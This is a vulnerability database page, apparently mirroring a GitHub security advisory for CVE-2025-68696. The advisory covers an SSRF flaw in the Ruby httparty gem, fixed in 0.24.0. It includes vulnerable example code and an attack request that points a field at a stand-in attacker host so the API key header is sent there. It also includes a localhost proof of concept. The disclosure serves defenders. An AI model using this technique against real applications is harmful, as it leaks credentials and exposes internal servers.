Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-hm5p-x4rq-38w4

Опубликовано: 23 дек. 2025
Источник: github
Github: Прошло ревью
CVSS4: 7.8
CVSS3: 8.2

Описание

httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage

Summary

There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL, it ignores the base_uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.

Consider the following example of a web application:

require 'sinatra' require 'httparty' class RepositoryClient include HTTParty base_uri 'http://exmaple.test/api/v1/repositories/' headers 'X-API-KEY' => '1234567890' end post '/issue' do request_body = JSON.parse(request.body.read) RepositoryClient.get(request_body['repository_id']).body # do something json message: 'OK' end

Now, suppose an attacker sends a request like this:

POST /issue HTTP/1.1 Host: localhost:10000 Content-Type: application/json { "repository_id": "http://attacker.test", "title": "test" }

In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.

A similar problem was reported and fixed in the HTTP client library axios in the past:
https://github.com/axios/axios/issues/6463

Also, Python's urljoin function has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin

PoC

Follow these steps to reproduce the issue:

  1. Set up two simple HTTP servers.

    mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 &

  2. Create a script (for example, main.rb):

    require 'httparty' class Client include HTTParty base_uri 'http://localhost:10001' end data = Client.get('http://localhost:10002').body puts data

  3. Run the script:

    $ ruby main.rb this is server2

Although base_uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.

Impact

  • Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
  • SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
  • Affected users: Any software that uses base_uri and does not properly validate the path parameter may be affected by this issue.

Ссылки

Пакеты

Наименование

httparty

rubygems
Затронутые версииВерсия исправления

<= 0.23.2

0.24.0

EPSS

Процентиль: 12%
0.00039
Низкий

7.8 High

CVSS4

8.2 High

CVSS3

CVE ID

CVE-2025-68696

Дефекты

CWE-918

Связанные уязвимости

ubuntu логотип

CVE-2025-68696

CVSS3: 8.2
ubuntu
23 дня назад

httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.

nvd логотип

CVE-2025-68696

CVSS3: 8.2
nvd
23 дня назад

httparty is an API tool. In versions 0.23.2 and prior, httparty is vulnerable to SSRF. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers. This issue has been patched via commit 0529bcd.

debian логотип

CVE-2025-68696

CVSS3: 8.2
debian
23 дня назад

httparty is an API tool. In versions 0.23.2 and prior, httparty is vul ...

EPSS

Процентиль: 12%
0.00039
Низкий

7.8 High

CVSS4

8.2 High

CVSS3

CVE ID

CVE-2025-68696

Дефекты

CWE-918